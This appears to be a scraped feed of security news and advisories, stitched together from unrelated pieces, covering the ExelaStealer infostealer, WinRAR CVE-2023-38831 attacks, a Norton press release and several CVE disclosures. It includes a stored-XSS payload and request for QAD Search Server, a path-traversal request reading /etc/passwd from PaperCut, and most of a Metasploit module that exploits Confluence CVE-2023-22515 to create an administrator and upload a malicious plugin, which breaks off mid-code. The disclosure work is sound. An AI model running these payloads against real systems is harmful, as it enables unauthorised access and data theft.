By Waqas
Another day, another malware threat against Windows devices and users!
This is a post from HackRead.com Read the original post: New Windows Infostealer ‘ExelaStealer’ Being Sold on Dark Web

Be cautious of the newly advertised ExelaStealer infostealer malware, now making the rounds on dark web forums and Telegram. Its primary aim is to target Windows-based devices.

****_KEY FINDINGS_****

**FortiGuard Labs has discovered a new infostealer in the cybercrime landscape called ExelaStealer mostly targeting Windows device**s.

**The infostealer is written in Python but uses resources in many different languages when required.**

**The malware deployment entails a decoy PDF file and executing obfuscated Python code.**

**It can steal sensitive user data, including session data and cookies, credit card details, passwords, and keystrokes.**

**It can collect extensive system data, including WLAN profiles and firewall status.**

**ExelaStealer is available in open-source and paid versions on the Dark web. The paid version comes with additional customization features.**

****ExelaStealer** uses code obfuscation techniques to block analysis and reverse engineering efforts.**

We have seen many infostealing malware emerging in cyberspace including Raccoon, RedLine, Vidar, and the relatively new entrant ThirdEye. However, the buzz in the cybersecurity world is that the yet-unknown ExelaStealer is far more dangerous than these.

The cybersecurity researchers at FortiGuard Labs discovered ExelaStealer in August 2023 and provided a detailed account of ExelaStealer’s workings in its new blog post. Per its research, the infostealer is offered as open-source and paid versions on the dark web, with the paid one featuring extended capabilities.

The malware is written in Python but often uses other language resources such as JavaScript. Windows-based systems are its key targets, whereas the malware looks for sensitive data such as passwords, session data, cookies, keystrokes, and credit card details.

Both versions of ExelaStealer are advertised on Dark Web forums with all the ads posted by a single contact using the handle “quicaxd.” For the paid version, the pricing structure varies. A monthly subscription is offered at $20, a three-month subscription is $45, and a lifetime subscription is $120.

It is worth noting that, according to FortiGuard Lab’s report, an active Telegram channel is used for facilitating purchases and getting access to the GitHub repository for the open-source version.

Given the infostealer’s open-source feature, it is possible for anyone with basic programming skills to create their own binaries using its source code. At the moment, ExelaStealer’s packaging and configuration are such that they can only affect Windows systems.

As per Fortiguard Labs, the binaries they analyzed have been released as part of a specific campaign, and the involvement of a decoy document further supports this assumption.

Researchers couldn’t identify the initial attack vector, but they suspect it could be achieved through malware deployment, watering holes, or phishing attacks. The binary is the attack’s first stage, which spawns an executable (sirket-ruhsat-pdf.exe) and launches a PDF viewer to display a decoy document titled ‘BNG 824 ruhsat.pdf’ to the user. Sirket-ruhsat-pdf.exe and BNG 824 ruhsat.pdf are planted into the C: drive’s root directory in which the former is a PyInstaller-generated file while the latter is a decoy file.

Regarding the attack stages, FortiGuard Labs researchers noted that the malware’s core functionality is embedded in a file titled Exela.py. The build process starts with a batch file that invokes Python and the ‘build.py’ file. The builder then uses a file titled ‘obf.py’ to hide the infostealer’s code and evade detection, reverse engineering, and analysis efforts.

Except for the library components, the obfuscated code is consolidated into a file titled ‘Obfuscated.py’ which is then deployed. The malware then starts gathering data along with executing a base64-encoded PowerShell command. The information is sent to the attacker’s Telegram channel, where the files are packaged into a ZIP archive and sent to a Discord webhook.

****Look out for Watering Hole and Phishing Attacks****

To protect yourself from ExelaStealer, users need to be on the lookout for watering holes and phishing attacks. A watering hole attack is a type of cyberattack in which the attacker identifies and compromises a website that is frequented by a particular group of individuals or organizations.

The goal of this attack is to infect the visitors’ computers with malware or exploit vulnerabilities in their systems. The term “watering hole” is derived from the concept of predators waiting near watering holes in the wild to ambush their prey when they come to drink.

To protect against watering hole attacks, individuals and organizations should regularly update their software, use strong security measures, and be cautious when visiting websites, especially those that might be of interest to potential attackers. Additionally, security solutions that can detect and block malicious activity are essential for identifying and mitigating such attacks.

****_**_KEY FINDINGS_**_****

1.  Formbook Takes the Throne as Most Prevalent Malware
2.  New version of Jupyter infostealer delivered through MSI installer
3.  Fake ChatGPT and AI pages on Facebook are spreading infostealers

New Windows Infostealer ‘ExelaStealer’ Being Sold on Dark Web

A new information stealer named ExelaStealer has become the latest entrant to an already crowded landscape filled with various off-the-shelf malware designed to capture sensitive data from compromised Windows systems.
"ExelaStealer is a largely open-source infostealer with paid customizations available from the threat actor," Fortinet FortiGuard Labs researcher James Slaughter said in a

A new information stealer named **ExelaStealer** has become the latest entrant to an already crowded landscape filled with various off-the-shelf malware designed to capture sensitive data from compromised Windows systems.

"ExelaStealer is a largely open-source infostealer with paid customizations available from the threat actor," Fortinet FortiGuard Labs researcher James Slaughter said in a technical report.

Written in Python and incorporating support for JavaScript, it comes fitted with capabilities to siphon passwords, Discord tokens, credit cards, cookies and session data, keystrokes, screenshots, and clipboard content.

ExelaStealer is offered for sale via cybercrime forums as well as a dedicated Telegram channel set up by its operators who go by the online alias quicaxd. The paid-for version costs $20 a month, $45 for three months, or $120 for a lifetime license.

The low cost of the commodity malware makes it a perfect hacking tool for newbies, effectively lowering the barrier to entry for pulling off malicious attacks.

The stealer binary, in its current form, can only be compiled and packaged on a Windows-based system using a builder Python script, which throws necessary source code obfuscation to the mix in an attempt to resist analysis.

There is evidence to suggest that ExelaStealer is being distributed via an executable that masquerades as a PDF document, indicating that the initial intrusion vector could be anything ranging from phishing to watering holes.

Launching the binary displays a lure document – a Turkish vehicle registration certificate for a Dacia Duster – while stealthily activating the stealer in the background.

"Data has become a valuable currency, and because of this, attempts to gather it will likely never cease," Slaughter said.

"Infostealer malware exfiltrates data belonging to corporations and individuals that can be used for blackmail, espionage, or ransom. Despite the number of infostealers in the wild, ExelaStealer shows there is still room for new players to emerge and gain traction."

The disclosure comes as Kaspersky revealed details of a campaign that targets government, law enforcement, and non-profit organizations to drop several scripts and executables at once to conduct cryptocurrency mining, steal data using keyloggers, and gain backdoor access to systems.

"The B2B sector remains attractive to cybercriminals, who seek to exploit its resources for money-making purposes," the Russian cybersecurity firm said, noting that most of the attacks were aimed at organizations in Russia, Saudi Arabia, Vietnam, Brazil, Romania, the U.S., India, Morocco, and Greece.

Earlier this week, U.S. cybersecurity and intelligence agencies released a joint advisory outlining the phishing techniques malicious actors commonly use to obtain login credentials and deploy malware, highlighting their attempts to impersonate a trusted source to realize their goals.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

ExelaStealer: A New Low-Cost Cybercrime Weapon Emerges

The QAD Search Server is vulnerable to Stored Cross-Site Scripting (XSS) in versions up to, and including, 1.0.0.315 due to insufficient checks on indexes. This makes it possible for unauthenticated attackers to create a new index and inject a malicious web script into its name, that will execute whenever a user accesses the search page.

**CVE ID**: CVE-2023-45471

**Vulnerability Type**: Cross-Site Scripting (XSS)

**Affected product**: QAD Search Server

**Affected versions**: 1.0.0.315 (confirmed), all prior versions (allegedly)

**Description**: The QAD Search Server is vulnerable to Stored Cross-Site Scripting (XSS) in versions up to, and including, 1.0.0.315 due to insufficient checks on indexes. This makes it possible for unauthenticated attackers to create a new index and inject a malicious web script into its name, that will execute whenever a user accesses the search page.

**Steps to reproduce**:

    1. Create a new index
    2. Type the following name: <img src=x onerror=alert(1)>
    
    GET /search/ui/indexes/add/%3Cimg%20src=x%20onerror=alert(1)%3E HTTP/1.1
    Host: <host>:22000
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://<host>:22000/search/ui/indexes/
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: JSESSIONID=9862F2D9B9E8A3C7D8F54FF613D55465
    Connection: close
    
    3. When a user visits the search page, the malicious JavaScript code will execute on their behalf.
    

**PoC**:

**References**:

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-45471

CVE-2023-45471: GitHub - itsAptx/CVE-2023-45471

An issue discovered in IXP Data EasyInstall 6.6.14907.0 allows attackers to gain escalated privileges via static Cryptographic Key.

CVE-2023-30132: EasyInstall CVE Issue

**PRESS RELEASE**

**TEMPE, Ariz.** **& PRAGUE****,** **Oct. 19, 2023** **/PRNewswire/ --** Norton, a consumer Cyber Safety brand of Gen™ (NASDAQ: GEN), today unveiled new features included with Norton Password Manager and Norton AntiTrack. Norton Password Manager offers a premium password management experience that continues to be available at no cost, and a new Private Email feature now available in Norton AntiTrack helps consumers quickly and easily take back control of their online privacy.

"Our enhancements to Norton Password Manager and Norton AntiTrack exemplify our passion for constantly improving our products and services to help our customers protect their online privacy and stay one step ahead of threats to their security," said Leena Elias, Chief Product Officer at Gen. "Free password managers are traditionally basic, difficult to access on different devices, and lack multi-layered security. With Norton Password Manager, you no longer have to choose between conveniently accessing your accounts and having excellent password protection. And, our addition of Private Email as part of Norton AntiTrack allows you to easily take steps to protect your online privacy when you're engaging with the digital world and protect your personal email address, which is often the gateway to your personal information and accounts. We are committed to helping our customers safeguard their online privacy through the launch of these solutions."

Accessible via the web, and available as a browser extension or mobile app, Norton Password Manager has been rebuilt with improvements to password security and privacy and redesigned to provide a seamless, intuitive customer experience.

Norton Password Manager now delivers greater convenience, security, and privacy with the following upgrades:

*   **Strengthened Vault Security and Recovery:** We notify you if your vault password needs to be strengthened and monitor the dark web for your vault password to help keep your passwords secure. New vault access recovery helps you recover the vault password if it's forgotten without compromising security.
*   **Improved Password Assessment:** Password strength is automatically assessed. If a weak password is detected, it's now easier to change it to be more complex and difficult to crack.
*   **Easy to Use:** A modern look and feel that's simple to set up and access the most used features from more locations; auto-filling and credential saving options appear seamlessly as you browse the web to provide quick access to accounts.

In addition to Norton Password Manager enhancements, Private Email is now available in Norton AntiTrack on Windows PCs. Private Email improves email privacy by masking your personal email addresses so they're unrecognizable, and removes hidden trackers often found in sent emails that can be used to gather private, personally identifiable information, including location, device usage, interests, and shopping behaviors.

Norton Password Manager is compatible with Windows PC, Mac, Android, and iOS, and available as a browser extension on Chrome, Firefox, Microsoft Edge, Safari, as well as browsers from Gen brands, Norton, Avast and Avira. For more information and to download Norton Password Manager, visit us.norton.com/products/norton-password-manager. Norton AntiTrack with Private Email is available to download at https://norton.com/products/norton-antitrack.

**About Norton**

Norton is a leader in Cyber Safety, and part of Gen™ (NASDAQ: GEN), a global company dedicated to powering Digital Freedom with a family of trusted consumer brands. Norton empowers millions of individuals and families with award-winning protection for their devices, online privacy, and identity. Norton products and services are certified by independent testing organizations including AV-TEST, AV-Comparatives, and SE Labs. Norton is a founding member of the Coalition Against Stalkerware. Learn more at www.norton.com.

Norton Boosts Security and Privacy With Enhanced Password Manager and AntiTrack

By Deeba Ahmed
All a user needs to do is visit the official WinRAR website and install the latest version to thwart the attack.
This is a post from HackRead.com Read the original post: APTs Exploiting WinRAR 0day Flaw Despite Patch Availability

According to Google’s Threat Analysis Group (TAG), the group exploiting the vulnerability comprises Sandworm, Fancy Bear, and APT40, all associated with the Russian government and military.

**_**KEY FINDINGS**_**

**Google’s TAG researchers have found that government-sponsored hackers are actively exploiting an already discovered WinRAR vulnerability.**

**This vulnerability lets hackers execute arbitrary code on the targeted device.**

**Attackers can steal sensitive data, hijack the victim’s computer, and install malware.**

**State-sponsored actors from a number of countries are exploiting this vulnerability in their malicious operations.**

**Google has urged users to immediately apply the latest WinRAR patch to prevent their devices from being invaded by state-backed actors.**

**Organizations must protect their networks by implementing a robust vulnerability management program and deploying endpoint security solutions.**

On August 25, 2023, Hackread.com reported a 0-day vulnerability in WinRAR, which was actively exploited worldwide, targeting 130 traders to successfully steal funds. It has now come to light that the vulnerability continues to be exploited, despite the availability of a security patch.

Google’s Threat Analysis Group (TAG) has discovered that state-backed threat actors are continuously exploiting a known vulnerability in the popular file archiver tool for Windows, WinRAR. The vulnerability is tracked as CVE-2023-38831, and it was exploited for the first time in early 2023 by cybercrime groups before it was identified by defenders. Now state-backed actors are exploiting it. Until August, this bug was exploited as zero-day. It was first reported by Group-IB researchers.

TAG’s Kate Morgan wrote in the report published on 18 October that despite that a patch was released soon after it was discovered, many devices remain unpatched and are vulnerable to exploitation. This is probably because the WinRAR tool doesn’t have an auto-update feature. It was fixed in WinRAR versions 6.24 and 6.23. Users have to download the patch manually.

Regarding the state-sponsored actors exploiting the WinRAR bug, TAG noted that three different clusters of attackers are involved. These include Sandworm aka FROZENBARENTS, Russian APT28 aka Fancy Bear or FROZENLAKE, and APT40 aka ISLANDDREAMS. 

For your information, Sandworm is affiliated with the Russian Armed Forces’ Main Directorate of the General Staff Unit 74455 and likes to target the energy sector. The Ukrainian drone-based email campaign Sandworm launched on September 6th exploits this bug to deliver a ZIP archive file. 

APT28 is also linked to the same unit but focuses on targeting Ukrainian government entities with a spearphishing campaign. APT40 is associated with the Chinese government and exploited this bug in late August to launch a phishing campaign targeting Papua New Guinea.

This vulnerability lets attackers execute arbitrary code on their targeted device by tricking the victim into opening a specially designed PNG file with a ZIP archive, leading to the stealing of sensitive data, installation of malware, or hijacking of the infected device. Since April 2023, cybercriminals have actively used this bug to target cryptocurrency trading accounts. 

> _“A logical vulnerability within WinRAR causing extraneous temporary file expansion when processing crafted archives, combined with a quirk in the implementation of Windows’ ShellExecute when attempting to open a file with an extension containing spaces.”_
> 
> Google’s Threat Analysis Group (TAG)

This widespread exploitation highlights that “exploits for known vulnerabilities can be highly effective, despite a patch being available” and indicates the importance of prompt application of security patches. 

****Update Your WinRAR Installer to the Latest Version****

To safeguard your system and personal data from potential threats, it’s crucial to keep your WinRAR installer up-to-date with the latest version. Updating your WinRAR software ensures that you have the latest security patches and enhancements, significantly reducing the risk of falling victim to cyberattacks.

You can get WinRaR’s latest version on its official website. Don’t wait – stay protected by regularly checking for updates and applying them as soon as they become available. Your digital security depends on it.

**_**RELATED ARTICLES**_**

1.  The Best Way to Install and Set-Up WinRAR 64-bit
2.  WinRAR vulnerability allowed attackers to remotely hijack systems
3.  Hackers are using 19-year-old WinRAR bug to install nasty malware

APTs Exploiting WinRAR 0day Flaw Despite Patch Availability

Terminal character injection in Mintty before 3.6.3 allows code execution via unescaped output to the terminal.

CVE-2022-47583: "[31m"?! ANSI Terminal security in 2023 and finding 10 CVEs

State-sponsored cyber espionage actors from Russia and China continue to target WinRAR users with various info-stealing and backdoor malware, as a patching lag plagues the software's footprint.

State-sponsored threat actors from Russia and China continue to throttle the remote code execution (RCE) WinRAR vulnerability in unpatched systems to deliver malware to targets.

Researchers at Google's Threat Analysis Group (TAG) have been tracking attacks in recent weeks that exploit CVE-2023-38831 to deliver infostealers and backdoor malware, particularly to organizations in Ukraine and Papua New Guinea. The flaw is a known and patched vulnerability in RarLab's popular WinRAR file archiver tool for Windows, but systems that haven't been updated remain vulnerable.

"TAG has observed government-backed actors from a number of countries exploiting the WinRAR vulnerability as part of their operations," Kate Morgan from Google TAG wrote in a blog post.

Russia-backed advanced persistent threat (APT) groups are the primary perpetrators of the latest attacks on WinRAR, according to Google TAG. On Sept. 6, Sandworm launched an email campaign impersonating a Ukrainian drone warfare training school using an invitation to join the school as a lure.

The infamous APT28 (aka Frozenlake, Fancy Bear, Strontium, or Sednit), another Russia-backed group, also used the flaw to deliver malware, which was targeting energy infrastructure in Ukraine via a phishing campaign that used a decoy document inviting targets to an event hosted by Razumkov Center, a public policy think tank in Ukraine.

Meanwhile, a phishing campaign from China-backed group IslandDreams (APT40) delivered infostealers to users in Papua New Guinea.

RarLab issued a beta patch for the issue on July 20 and an updated version of WinRAR (version 6.23) on Aug. 2, but many systems remain vulnerable and thus ripe for exploitation, Morgan noted. "After a vulnerability has been patched, malicious actors will continue to rely on n-days and use slow patching rates to their advantage," she wrote.

**Exploiting the WinRAR Flaw**

Group-IB discovered CVE-2023-38831 — a logical vulnerability within WinRAR — in July. However, APT groups already had been exploiting the flaw as a zero-day bug since April — including one by the Russia-backed threat group Evilnum that used weaponized ZIP files to target cryptocurrency traders.

The potential to exploit the flaw comes when the temporary file expansion, during archive processing, is combined with a quirk in the implementation of Windows ShellExecute when attempting to open a file with an extension containing spaces, according to Google TAG.

"The vulnerability allows attackers to execute arbitrary code when a user attempts to view a benign file (such as an ordinary PNG file) within a ZIP archive," Morgan wrote.

Later, mere hours after Group-IB posted its blog post outlining its discovery and analysis of the flaw, proof-of-concept exploits (PoCs) — including fake ones — and exploit generators appeared on public GitHub repositories. These fueled further and ongoing attacks on vulnerable systems.

**Latest WinRAR Targeting**

In the Sandworm attack, the messages included a link to an anonymous file-sharing service, fex\[.\]net, which, in turn, delivered a benign decoy PDF document with a drone operator training curriculum and a malicious ZIP file exploiting CVE-2023-38831. The file's payload was Rhadamanthys, a commodity infostealer that can exfiltrate, among other things, browser credentials and session information. Google TAG noted that use of commodity malware is not typical of Sandworm.

Meanwhile, Google TAG observed APT28 using a free hosting provider to serve an initial page that redirected users to a mockbin site to perform browser checks, and then yet again to another stage, which would ensure the visitor was coming from an IPv4 address in Ukraine. At this point the user would be prompted to download a file containing a CVE-2023-38831 exploit.

In late July and early August, the researchers also observed an APT28 attack that dropped the PowerShell script IronJaw, which steals browser login data and local state directories. The attack vector — which drops a BAT file that opens a decoy PDF file and creates a reverse SSH shell to an attacker-controlled IP address — was a new addition to the APT's toolkit, according to Google TAG.

Google TAG has linked a fourth recent WinRAR attack to China-backed IslandDreams — which also is tracked as Bronze Mohawk, GreenCrash, Kryptonite Panda, Periscope, and Mudcarp — through a phishing campaign in late August that targeted users in Papua New Guinea. The phishing emails included a Dropbox link to a ZIP archive containing a CVE-2023-38831 exploit in the form of a password-protected decoy PDF and an LNK file, which led to a next-stage payload known as Islandstager.

The Islandstager payload executes and decodes several layers of shellcode, the last of which loads and executes the final payload, BOXRAT, a .NET backdoor that uses Dropbox API as a command-and-control mechanism.

**Problematic Patching Delays**

Google TAG included indicators of compromise (IOCs) for the various attack scenarios to help users identify if their system is being exploited.

In the meantime, WinRAR users are urged to update their systems if they haven't already, as the campaigns highlight yet again the importance of timely patching — something that still seems to be a global challenge for software users, Morgan noted.

"These recent campaigns exploiting the WinRAR bug underscore the importance of patching and that there is still work to be done to make it easy for users to keep their software secure and up-to-date," she wrote.

Patch Now: APTs Continue to Pummel WinRAR Bug

A Path Traversal vulnerability exists in PaperCut NG before 22.1.1 and PaperCut MF before 22.1.1. Under specific conditions, this could potentially allow an attacker to achieve read-only access to the server's filesystem.

*   **CVE(s):** CVE-2023–31046
*   **Vendor:** PaperCut
*   **Product:** PaperCut MF/NG
*   **Version(s) affected:** < 22.1.1
*   **Fixed version:** 22.1.1

**Background #**

An Authenticated Arbitrary File Download vulnerability was found in PaperCut NG/MF. PaperCut is a popular Print Management product that’s used globally by over 80,000 organisations. Its application server component is written in Java. The majority of customers run their servers behind firewalls, however a number of larger customers like universities may have it hosted on more open servers. As part of my research I found this vulnerability and I worked with PaperCut Software to report, advise and validate a fix. The latest release of PaperCut NG/MF which can be found at http://www.papercut.com/ has the vulnerability addressed and upgrading is the recommended mitigation.

Arbitrary File Download/Read vulnerabilities can occur when an application allows files to be included in an unsafe way on a local machine, often through Directory Traversal techniques (being the root cause) whereby the application directory structure can be traversed to reach areas not originally intended by the developer.

In the case of PaperCut, the application server defines a servlet that can be accessed, with authentication (testing determined this could be the lowest level of authentication available), allowing for a crafted HTTP request to be sent that retrieves files from the underlying filesystem.

Within the web.xml configuration file for the PaperCut application software, the static-content-files servlet exists to allow for static content to be retrieved / displayed to the user.

    <servlet-mapping>
        <servlet-name>static-content-files</servlet-name>
        <url-pattern>/content/*</url-pattern>
    </servlet-mapping>
    

The affected Java code is available within the getStaticContent() function inside the UIContentResource.class:

      @GET
      @Path("static/{asset:.*}")
      @CacheControlHeader("max-age=600,public")
      public Response getStaticContent(@PathParam("asset") String asset) {
        try {
          File page = getResourceAsFile("/ui/static/" + asset);
          String contentType = MimeTypeUtils.getMimeTypeStringFromFileName(page.getName());
          return Response.ok(page, contentType).build();
        } catch (Exception e) {
          return Response.status(Response.Status.NOT_FOUND).build();
        } 
      }
      
      private File getResourceAsFile(String resourcePath) {
        String docroot = this._servletContext.getRealPath("/");
        return new File(docroot, resourcePath);
      }
    

As shown above within the code-block above, the @PathParam("asset") excerpt refers to the portion of the URL that is controllable by an authenticated user, which can be manipulated without further sanitisation being performed on the input. Once the crafted parameter has been passed into the getResourceAsFile() function, a new file object is created containing the contents of the requested file.

In this case, anything related to the application such as API keys (within /papercut/server/data/), as well as anything accessible on the filesystem such as /etc/passwd, /proc/self/environ can be downloaded by an attacker.

    GET /ui/static/..//..//..//..//..//..//..//etc//passwd HTTP/1.1
    Host: papercut:9192
    Cookie: <..omitted..>
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
    Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: https://papercut:9192/ui/static
    Sec-Fetch-Dest: font
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    Te: trailers
    Connection: close
    

The HTTP response of the above request will contain the requested /etc/passwd file contents.

Depending on the user that the papercut application server is running as, the available files will vary - however at the very minimum files that lie within the papercut application server directories will be disclosed including API secrets (allowing for authenticated API calls to be made).

**Recommendations #**

Mitigations were discussed with the PaperCut Software security team and they’ve provided me with following guidance for inclusion within this public disclosure.

“We feel the best course of action for customers is for them to upgrade to the latest release of PaperCut NG/MF which contains fixes for this issue. We will make this clear through our release notes and our check-for-updates feature. We feel the mitigation put into the code is very effective and a good outcome. It has both a mix of your suggestions and the ideas that our security team came up with. Good security comes through a diversity of thought, and we really wanted to call out this as a great example. It’s been amazing working with you, sharing ideas, on how to address this both efficiently and quickly. Often security CVE reports are very one-way. Your collaboration on both mitigation and validation has been a standout. It really demonstrates the importance of ISVs and Infosec providers working together. This aspect is often understated in security research and uplift.”

**Timeline #**

Here’s a disclosure timeline:

1.  **Initial Attempt to Contact Vendor**
    
    28 March 2023
    
    Contacted the PaperCut Support Team.
    
2.  **Initial Contact with Security Team**
    
    28 March 2023
    
    Received response from PaperCut Support within 20 minutes.
    
3.  **Vulnerability Disclosure Response**
    
    30 March 2023
    
    PaperCut Support advised that several fixes had been proposed and a hotfix was available to test.
    
4.  **Vendor Update**
    
    3 April 2023
    
    Test build of the fix was provided by PaperCut for us to validate proposed fixes.
    
5.  **Vendor Update**
    
    4 April 2023
    
    PaperCut requested 120 day disclosure timeline as well as discussed other security bulletin related information.
    
6.  **Aura Update**
    
    4 April 2023
    
    Confirmed that a delayed disclosure was not a problem at all. Vendor's active responses and development updates were showing considerable thought was being put in place around resolving the issue.
    
7.  **Proposed fixes**
    
    24 April 2023
    
    Further vendor communications around improving the overall effectiveness of proposed fixes.
    
8.  **CVE Assignment: CVE-2023-31046**
    
    24 April 2023
    
    The vendor had requested a CVE on our behalf: CVE-2023-31046.
    
9.  **Patches!**
    
    7 June 2023
    
    Vendor released patches, along with public security bulletin: https://www.papercut.com/kb/Main/SecurityBulletinJune2023.
    
10.  **Public Disclosure**
    
    14 August 2023
    
    CVE disclosure via MITRE and blog posted.
    

**Disclaimer #**

The information in this article is provided for research and educational purposes only. Aura Information Security does not accept any liability in any form for any direct or indirect damages resulting from the use of or reliance on the information contained in this article.

CVE-2023-31046: Authenticated Arbitrary File Download (Path Traversal)

This Metasploit module exploits an improper input validation issue in Atlassian Confluence, allowing arbitrary HTTP parameters to be translated into getter/setter sequences via the XWorks2 middleware and in turn allows for Java objects to be modified at run time. The exploit will create a new administrator user and upload a malicious plugins to get arbitrary code execution. All versions of Confluence between 8.0.0 through to 8.3.2, 8.4.0 through to 8.4.2, and 8.5.0 through to 8.5.1 are affected.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Retry  include Msf::Exploit::Remote::HttpClient  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Atlassian Confluence Unauthenticated Remote Code Execution',        'Description' => %q{          This module exploits an improper input validation issue in Atlassian Confluence, allowing arbitrary HTTP          parameters to be translated into getter/setter sequences via the XWorks2 middleware and in turn allows for          Java objects to be modified at run time. The exploit will create a new administrator user and upload a          malicious plugins to get arbitrary code execution. All versions of Confluence between 8.0.0 through to 8.3.2,          8.4.0 through to 8.4.2, and 8.5.0 through to 8.5.1 are affected.        },        'License' => MSF_LICENSE,        'Author' => [          'sfewer-r7', # MSF Exploit & Rapid7 Analysis        ],        'References' => [          ['CVE', '2023-22515'],          ['URL', 'https://attackerkb.com/topics/Q5f0ItSzw5/cve-2023-22515/rapid7-analysis'],          ['URL', 'https://confluence.atlassian.com/security/cve-2023-22515-privilege-escalation-vulnerability-in-confluence-data-center-and-server-1295682276.html'],        ],        'DisclosureDate' => '2023-10-04',        'Privileged' => false, # `NT AUTHORITY\NETWORK SERVICE` on Windows by default.        'Targets' => [          [            'Automatic',            {              'Platform' => 'java',              'Arch' => [ARCH_JAVA]            }          ],        ],        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          # Note we cannot delete the admin user we create, as Confluence prevents a user deleting themself.          'SideEffects' => [IOC_IN_LOGS]        }      )    )    register_options(      [        # By default Confluence listens for HTTP requests on TCP port 8090.        Opt::RPORT(8090),        # Confluence may have a non default base path, allow user to configure that here.        OptString.new('TARGETURI', [true, 'Base path for Confluence', '/']),        # The endpoint we target to trigger the vulnerability.        OptString.new('CONFLUENCE_TARGET_ENDPOINT', [true, 'The endpoint used to trigger the vulnerability.', 'server-info.action']),        # We upload a new plugin, we need to wait for the plugin to be installed. This options governs how long we wait.        OptInt.new('CONFLUENCE_PLUGIN_TIMEOUT', [true, 'The timeout (in seconds) to wait when installing a plugin', 30])      ]    )  end  def check    res = send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, datastore['CONFLUENCE_TARGET_ENDPOINT'])    )    return CheckCode::Unknown('Connection failed') unless res    # Ensure target is a Confluence server by identifying an expected HTTP header.    return CheckCode::Unknown('No \'X-Confluence-Request-Time\' header') unless res.headers.key? 'X-Confluence-Request-Time'    if res.code == 200 && res.body      # Pull out the version string from one of three known locations within the HTML.      m = res.body.match(/ajs-version-number" content="(\d+\.\d+\.\d+)"/i)      if m.nil?        m = res.body.match(/Printed by Atlassian Confluence (\d+\.\d+\.\d+)/i)        if m.nil?          m = res.body.match(%r{<span id='footer-build-information'>(\d+\.\d+\.\d+)</span>}i)        end      end      unless m.nil?        version = Rex::Version.new(m[1])        ranges = [          ['8.0.0', '8.3.2'],          ['8.4.0', '8.4.2'],          ['8.5.0', '8.5.1']        ]        # If we have a Confluence server within the given version ranges, it appears vulnerable.        ranges.each do |min, max|          if version.between?(Rex::Version.new(min), Rex::Version.new(max))            return Exploit::CheckCode::Appears("Atlassian Confluence #{version}")          end        end        # By here we know we have a confluence server, but the version found indicates it is safe.        return Exploit::CheckCode::Safe("Atlassian Confluence #{version}")      end    end    # By here we have identified a Confluence server, but could not get the version number to determine if it is    # vulnerable of not.    CheckCode::Detected  end  def exploit    target_endpoint = normalize_uri(target_uri.path, datastore['CONFLUENCE_TARGET_ENDPOINT'])    print_status("Setting the application configuration's setupComplete to false via endpoint: #{target_endpoint}")    # 1. Leverage CVE-2023-22515 to modify a configuration setting, allowing us to reach the /setup/* endpoints.    res = send_request_cgi(      'method' => 'POST',      'uri' => target_endpoint,      'vars_post' => {        'bootstrapStatusProvider.applicationConfig.setupComplete' => 'false'      }    )    unless res&.code == 302 || res&.code == 200      fail_with(Failure::UnexpectedReply, "Unexpected reply from endpoint: #{target_endpoint}")    end    print_status('Creating a new administrator user account...')    # usernames must be lowercase    admin_username = rand_text_alpha_lower(8)    admin_password = rand_text_alphanumeric(8)    # 2. Create a new administrator user account.    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'setup', 'setupadministrator.action'),      'headers' => {        'X-Atlassian-Token' => 'no-check'      },      'vars_post' => {        'username' => admin_username,        'fullName' => rand_text_alphanumeric(8),        # The email address does not need to be a valid address, but it must contain an @ character.        'email' => "#{rand_text_alphanumeric(8)}@#{rand_text_alphanumeric(8)}",        'password' => admin_password,        'confirm' => admin_password,        'setup-next-button' => 'Next'      }    )    unless res&.code == 302 || res&.code == 200      fail_with(Failure::UnexpectedReply, 'Unexpected reply from endpoint: /setup/setupadministrator.action')    end    print_status("Created #{admin_username}:#{admin_password}")    # 3. Force the setup to become completed, to allow normal Confluence operations to continue.    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'setup', 'finishsetup.action'),      'headers' => {        'X-Atlassian-Token' => 'no-check'      }    )    unless res&.code == 200      fail_with(Failure::UnexpectedReply, 'Unexpected reply from endpoint: /setup/finishsetup.action')    end    print_status('Adding a malicious plugin...')    # 4. Upload a new Confluence Servlet plugin, by first requesting a UPM token.    res = send_request_cgi(      'method' => 'GET',      # Note, we concatenate '/' as this is required by the endpoint.      'uri' => normalize_uri(target_uri.path, 'rest', 'plugins', '1.0') + '/',      'headers' => {        'Authorization' => basic_auth(admin_username, admin_password),        'Accept' => '*/*'      },      'vars_get' => {        'os_authType' => 'basic'      }    )    unless res&.code == 200      fail_with(Failure::UnexpectedReply, 'Unexpected reply from endpoint: /rest/plugins/1.0/')    end    upm_token = res.headers['upm-token']    unless upm_token      fail_with(Failure::UnexpectedReply, 'No UPM token from endpoint: /rest/plugins/1.0/')    end    begin      payload_endpoint = rand_text_alphanumeric(8)      plugin_key = rand_text_alpha(8)      # 5. Construct a malicious Servlet plugin JAR file. We set :random to true which will randomize the string      # 'metasploit' in the class paths (via Rex::Zip::Jar::add_sub).      jar = payload.encoded_jar(random: true)      jar.add_file(        'atlassian-plugin.xml',        %(<atlassian-plugin name="#{rand_text_alpha(8)}" key="#{plugin_key}" plugins-version="2">  <plugin-info>    <description>#{rand_text_alphanumeric(8)}</description>    